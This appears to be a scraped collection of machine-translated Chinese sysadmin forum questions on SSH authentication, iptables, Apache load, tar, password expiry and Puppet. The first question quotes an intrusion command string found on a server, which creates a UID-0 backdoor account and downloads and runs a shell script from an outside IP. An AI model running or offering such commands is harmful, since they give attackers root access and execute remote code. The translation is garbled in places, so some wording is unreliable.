我可能刚刚检测到,我的服务器上的用户已经扎根我的服务器,但这不是我问的。 有没有人见过像这样的命令: echo _EoT_0.249348813417008_; id; echo _EoT_0.12781402577841_; echo $PATH && a=`env |grep PATH | awk -F '=' '{print $2":/usr/sbin"}'` && export PATH=$a && echo $PATH; echo _EoT_0.247556708344121_; whereis useradd; echo _EoT_0.905792585668774_; useradd -p saZlzoRm9L4Og -o -g 0 -u 0 aspnet; echo _EoT_0.369123892063307_; wget http://178.xxx.xxx.181/suhosin14.sh; echo _EoT_0.845361576801043_; chmod +x suhosin14.sh && ./suhosin14.sh && sleep 5 && […]
我正在使用sshd,并允许用公钥authenticationlogin。 我想允许select用户使用PAM双因素authentication模块login。 有没有什么办法可以允许特定用户使用PAM双因素身份validation? 同样的道理 – 我只想为特定帐户启用密码validation。 我希望我的SSH守护进程拒绝密码authentication,试图阻止黑客入侵,认为我不接受密码authentication – 除了有人知道我严密保护的秘密帐户,这是密码启用的情况。 我想这样做的情况下,我的SSH客户端不会让我做任何密钥或双因素身份validation。
我在我的Linux系统上安装了boost.x86_64 : $ sudo yum install boost.x86_64 Loaded plugins: fastestmirror, langpacks, presto, refresh-packagekit Adding en_US to language list Loading mirror speeds from cached hostfile * fedora: mirror.uoregon.edu * updates: mirror.uoregon.edu Setting up Install Process Package boost-1.44.0-8.fc14.x86_64 already installed and latest version Nothing to do 但是当我查找boost文件时,找不到它们: $ sudo repoquery –list boost-1.44.0-8.fc14.x86_64 $ 这有点奇怪,因为我有提升和它的一些依赖项安装: $ sudo rpm […]
你在设置iptables时做了什么:改变默认策略(例如iptables -P INPUT DROP ),或者在规则集( iptables -A INPUT DROP )的最后添加一个catch-all规则? 如果你特别喜欢一个,你的偏好背后的理由是什么? 对于这个论坛来说,这个问题可能太主观了,但也许有一些很好的理由要select一个我不知道的问题。 与我的政策方式不同,由于过于乐观的iptables -F ,locking服务器可能更容易。 对于我来说,删除全面的规则可能会更容易,而不会意识到这一点,从而有效地将服务器全部打开(过去我曾经遇到过这种情况)。 确实,你不应该依靠防火墙作为你唯一的防止互联网的保护(大多数情况下,你可以使内部networking服务只绑定到本地主机或内部networking,例如),但是有时候,公共服务到特定的源networking等 就我个人而言,如果从头开始编写一个规则集,我倾向于第一个,但如果更新现有规则集,则坚持已有的规则集。
最近我的networking服务器出现了一些奇怪的问题。 在过去的一天左右,这个网站似乎随机有所放缓,我们似乎没有遇到任何大的额外stream量,但是快速浏览“top”和httpd似乎是从3-10 %到99%左右,然后在80年代中期之后短暂触及然后回落。 例如: PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 2443 apache 25 0 256m 20m 5472 R 88.2 2.1 3:22.29 httpd 这似乎每30分钟左右发生一次。 奇怪的是同时发生这种情况我可以运行Apache服务器状态页面,并将获得(例如): CPU Usage: u700.5 s6.22 cu0 cs0 – 20.2% CPU load 所以我的问题是双重的: 有谁知道为什么这个问题可能在最后一天左右出现(没有对服务器进行任何修改) 为什么我的CPU使用率统计数据会远远高于服务器状态,哪个是正确的?
在使用tar时使用–remove-files选项的正确方法是什么? 是吗… tar -cfvj –remove-files archive.tar.bz2 archive/ 要么… tar -cfvj archive.tar.bz2 archive/ –remove-files
上下文 所以我build立了一个新的Debian服务器,并增加了一些用户的网页空间等等,这是平常的事情。 向前跳过180天,用户开始抱怨login无效。 鉴于不止一个人提出了,我检查了身份validation日志和… BOOM。 由于密码过期而导致login失败。 党! 傻我没有考虑在这个特定的服务器上的密码过期政策。 请注意,这些用户没有shell权限,但可以通过sftplogin来pipe理他们的networking空间。 所以即使他们知道,他们也不会被提醒过期或者有能力改变密码。 从我可以告诉,错误只是被logging在服务器端。 客户端这是一个通用的身份validation错误。 题 如何轻松询问服务器以获取所有用户的密码过期信息? 一旦我有了这些信息,我就可以很容易地看到哪些用户正在受到影响以及将来会受到哪些影响。
我有一个12个字母和数字的电子邮件地址。 这个电子邮件地址从来没有在网上使用,或者用来发送电子邮件给其他人,但我收到垃圾邮件。 这在我和Linux上都发生了。 是否因为垃圾邮件发送者可以连接到我的邮件服务器,并获取有效的电子邮件地址列表?
我正在Media Temple主办的一个专用虚拟16GB RAM CentOS服务器上运行一个高stream量的网站。 很多时候,服务器因CPU使用率过高而死亡(%1500) 当我检查正在运行的进程使用“顶部”的命令,我看到太多的httpd进程运行,我认为是造成CPU的高使用率。 我试图调整mysql,调整apache,my.cnf,httpd.cnf,删除Apache模块,我不使用,但没有解决问题。 请让我知道你需要知道什么值在我的服务器configuration,以帮助我诊断问题。 提前致谢。
我是Puppet的新手,我想知道它是否是在Solaris和Linux上的补丁/包pipe理的有效解决scheme。 我对Solaris更感兴趣。 到目前为止,我无法find任何相关的文件。 我在哪里可以find如何处理这个文件?